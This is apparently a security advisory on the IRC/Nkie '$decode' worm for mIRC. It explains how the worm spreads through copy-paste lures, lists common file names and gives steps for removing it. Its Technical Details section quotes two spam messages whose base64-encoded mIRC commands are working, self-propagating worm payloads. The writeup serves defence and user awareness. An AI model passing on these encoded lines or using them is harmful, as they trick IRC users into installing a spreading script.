IRC/Nkie Worm

Description:
The IRC/Nkie worm is among the top five most common IRC worms today. It is
also the least documented worm on the internet.

This worm is commonly called the $decode worm on IRC. The original $decode
is a mIRC script named nkie.txt. It is triggered when someone types !list in
any channel an infected user is in. The trigger is a simple mIRC code sent
encrypted to the person who typed the !list command.

Today there are many variants, all of these spam encrypted mIRC code to
anyone that either types a trigger, or joins/parts a channel the infected
user is in. Some variants have a timer in the code that waits for a few
seconds, then spams the code only if the user is not oped. This is to
prevent channel moderators from seeing the spam and kicking the infected
user. Most people do not even realize they have this worm until they are
kicked from an IRC channel with instructions to join #NoHack. To date the
worm has no destructive payload, but that could change. As with any worm,
care should be taken when removing.

Technical Details:
The worm spreads by spaming people over IRC networks with messages similar
to these:

<cooleun> hey Golcor to get OPs use this hack in the chan but SHH!
//$decode( d3JpdGUgxCAkcmVhZCgkc2NyaXB0LG4sMSk= ,m) |
$decode( LmxvYWQgLXJzIMQ= ,m)

<^BlueyEBOy^> STOP SPAM, USE THIS COMMAND: //write nospam
$decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZy
AkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgLy93cml0
ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcm
lwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIG5vc3Bhb
SAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfSB9,m) | .load -rs
nospam | //mode $me +R
It works with the $decode() and $encode() methods built into the mIRC
scripting language. When a user gets spammed with one of these messages, and
then copies the text into the edit box, the text is interpreted by mIRC and
executed as if the user had typed the command in plainly. Although the
scripts vary on what they say, the theme is the same: They write a small
script to the mIRC folder, load it into the remote section of mIRC, and then
go to work spamming others, enticing them to copy and paste too. Any name
can be given to the file. Some common file names include:
Ä
chat
dab.txt
god.dll
hack
mirc32.ini
nkie.txt
nospam
twg.txt
s.txt
vv.pif

 

Solution:
Because it is a simple spam worm, removal is easy: Simply unload and delete
the script. If you have a lot of scripts loaded you will have to determine
which script(s) are spamming. One easy way to do this is to copy the last
part of the actual message you are spamming and /echo it back to yourself in
the status window. Taking the first example from above, you would copy
$decode( LmxvYWQgLXJzIMQ= ,m) to the clipboard. Then in the status window
type:

//echo -a . $decode( LmxvYWQgLXJzIMQ= ,m)
This will reveal the file name of the script. All $decode worms will have a
load command after the final “|” character. In this case we see that .load
-rs Ä is the final command, giving us the file name Ä, or ASCII character
142. You can type this letter by holding down the ALT key and pressing 142
on the numeric pad, then release the ALT key. Regardless of the temptation
or promises, do not copy and paste anything in mIRC you do not understand.
This worm is a new spin on an old trick. The same thing used to be achieved
by getting users to copy endless $chr() characters into the edit box, which
will execute any command given as if it was typed normally.